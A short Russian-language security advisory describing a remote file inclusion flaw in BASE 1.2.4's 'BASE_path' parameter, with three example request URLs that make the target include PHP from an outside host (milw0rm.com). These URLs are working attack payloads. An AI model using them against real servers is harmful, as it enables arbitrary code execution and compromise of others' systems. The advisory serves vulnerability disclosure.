Программа: Basic Analysis and Security Engine (BASE) 1.2.4, возможно более ранние версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "BASE_path" в сценариях base_qry_common.php, base_stat_common.php и base_include.inc.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена.

Пример:

http://[site]/snort/base_qry_common.php?BASE_path= http://www.milw0rm.com/index.php?&
http://[site]/snort/base_stat_common.php?BASE_path= http://www.milw0rm.com/index.php?&
http://[site]/snort/includes/base_include.inc.php?BASE_ path=http://www.milw0rm.com/index.php?&
 



Оставить мнение